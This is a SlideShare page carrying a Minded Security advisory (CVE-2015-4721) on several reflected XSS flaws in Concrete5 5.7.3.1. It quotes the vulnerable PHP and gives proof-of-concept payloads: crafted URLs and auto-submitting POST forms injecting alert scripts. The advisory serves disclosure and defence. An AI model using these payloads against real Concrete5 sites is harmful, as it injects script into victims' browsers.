SlideShare une entreprise Scribd logo

Concrete5 Multiple Reflected XSS Advisory

Minded Security
Minded Security

The document describes multiple reflected cross-site scripting (XSS) vulnerabilities identified in Concrete5 version 5.7.3.1. User input passed through various request parameters was not properly sanitized before being used to generate HTML output, allowing attackers to potentially inject arbitrary JavaScript code. The vulnerabilities were addressed in Concrete5 version 5.7.4. The vulnerabilities included issues in files related to page versions, user selection, group searching, language setup, single page loading, and attribute selection.

Logiciels
1  sur  5
Télécharger pour lire hors ligne
Edition: 1.0 Last Edit: 24/06/2015 Cassification: Not restricted Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1 Author: Egidio Romano
Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4  Summary Vulnerabilities Class Cross Site Scripting (XSS) CVE ID CVE-2015-4721 Remote Yes Local No Published June 6, 2015 Updated June 24, 2015 Credit Egidio Romano Vulnerable Version 5.7.3.1 and probably prior versions Fixed On 5.7.4 Other References https://hackerone.com/reports/59661 http://blog.mindedsecurity.com/2015/06/multiple- security-issues-discovered-in-concrete5-part1.html  Description Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.  Vulnerabilities Details Following are the reflected XSS vulnerabilities identified:  File: /concrete/views/panels/details/page/versions.php (lines 5-14): <?php foreach($_REQUEST['cvID'] as $cvID) { $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked); $checked = false; } print $ih->tabs($tabs); foreach($_REQUEST['cvID'] as $cvID) { ?>
Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/4 <div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%"> <iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" /> User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these: http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscri pt%3Ealert%28/XSS/%29%3C/script%3E%3C!-- http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/if rame%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35): public function selectUser($fieldName, $uID = false, $javascriptFunc … $selectedUID = 0; if (isset($_REQUEST[$fieldName])) { $selectedUID = $_REQUEST[$fieldName]; } else if ($uID > 0) { $selectedUID = $uID; } $html = ''; $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary- selected-item-inner"><strong class="ccm-summary-selected-item-label">'; if ($selectedUID > 0) { $ui = UserInfo::getByID($selectedUID); $html .= $ui->getUserName(); } $html .= '</strong></div>'; $identifier = new ConcreteCoreUtilityServiceIdentifier(); $selector = $identifier->getString(32); $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog- modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>'; $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';/> User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/4 http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscrip t%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/elements/group/search.php (lines 4-20): $searchRequest = $_REQUEST; $result = Loader::helper('json')->encode($controller->getSearchResultObject()- >getJSONObject()); $tree = GroupTree::get(); $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID); $registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID); ?> <style type="text/css"> div[data-search=groups] form.ccm-search-fields { margin-left: 0px !important; } </style> <div data-search="groups"> <script type="text/template" data-template="search-form"> <form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm- search-fields-none"> <input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" /> User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this: http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3 C/script%3E  URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon"> <input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'> </form>
Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 4/4 <script>document.forms[0].submit()</script> </body> </html>  URL: http://[host]/index.php/dashboard/pages/single User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/pages/single"> <input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'> </form> <script>document.forms[0].submit()</script> </body> </html>  File: /concrete/attributes/select/form.php (lines 55-60): $vals = $this->post('atSelectNewOption'); if (is_array($vals)) { foreach($vals as $v) { ?> <div class="newAttrValue"> <?php echo $form->hidden($this- >field('atSelectNewOption') . '[]', $v)?> <span class="badge"><?php echo $v?></span> /> User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.

Recommandé

Concrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryConcrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryMinded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Giorgio Fedon
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0Mihir Shah
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityRichard Peter Ong
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - IntroductionKnoldus Inc.
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTGaurav Roy
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applicationsn|u - The Open Security Community
 
OAuth 2
OAuth 2OAuth 2
OAuth 2ChrisWood262
 

Recommandé

Concrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryConcrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryMinded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Giorgio Fedon
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0Mihir Shah
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityRichard Peter Ong
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - IntroductionKnoldus Inc.
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTGaurav Roy
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applicationsn|u - The Open Security Community
 
OAuth 2
OAuth 2OAuth 2
OAuth 2ChrisWood262
 
Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugStefano Di Paola
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS DeobfuscationMinded Security
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque AttackMinded Security
 
Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)Roberto De Sortis - CBCI - QSA
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sOnyo
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKGuardSquare
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...owaspindia
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsCognizant
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile ApplicationsDenim Group
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS appsMax Bazaliy
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingJason Haddix
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityEryk Budi Pratama
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptxAnkit Giri
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comIdexcel Technologies
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...Ajin Abraham
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 

Contenu connexe

En vedette

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugStefano Di Paola
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS DeobfuscationMinded Security
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sOnyo
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKGuardSquare
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...owaspindia
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsCognizant
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile ApplicationsDenim Group
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS appsMax Bazaliy
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingJason Haddix
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityEryk Budi Pratama
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptxAnkit Giri
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comIdexcel Technologies
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...Ajin Abraham
 

En vedette (20)

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS Deobfuscation
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
 
Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, Solutions
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security Testing
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptx
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
 

Similaire à Concrete5 Multiple Reflected XSS Advisory

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
T3CON13: Web application development using Behaviour Driven Development
T3CON13: Web application development using Behaviour Driven DevelopmentT3CON13: Web application development using Behaviour Driven Development
T3CON13: Web application development using Behaviour Driven Developmentmhelmich
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in RailsUri Nativ
 
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsA Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsManish Shekhawat
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET CoreNETFest
 
ASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CSASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CStutorialsruby
 
ASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CSASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CStutorialsruby
 

Similaire à Concrete5 Multiple Reflected XSS Advisory (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Advanced xss
Advanced xssAdvanced xss
Advanced xss
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
4.Xss
4.Xss4.Xss
4.Xss
 
Client side
Client sideClient side
Client side
 
T3CON13: Web application development using Behaviour Driven Development
T3CON13: Web application development using Behaviour Driven DevelopmentT3CON13: Web application development using Behaviour Driven Development
T3CON13: Web application development using Behaviour Driven Development
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDB
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsA Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web Applications
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
 
ASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CSASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CS
 
ASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CSASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CS
 

Plus de Minded Security

Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Minded Security
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Minded Security
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'tsMinded Security
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Minded Security
 
Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Minded Security
 
BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017Minded Security
 
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security
 
Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Minded Security
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Minded Security
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedMinded Security
 

Plus de Minded Security (12)

Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'ts
 
Live hacking Demo
Live hacking DemoLive hacking Demo
Live hacking Demo
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018
 
Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017
 
BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017
 
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
 
Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
PHP Object Injection
PHP Object InjectionPHP Object Injection
PHP Object Injection
 

Dernier

%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...masabamasaba
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...masabamasaba
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2
 
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastArchitecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastPapp Krisztián
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
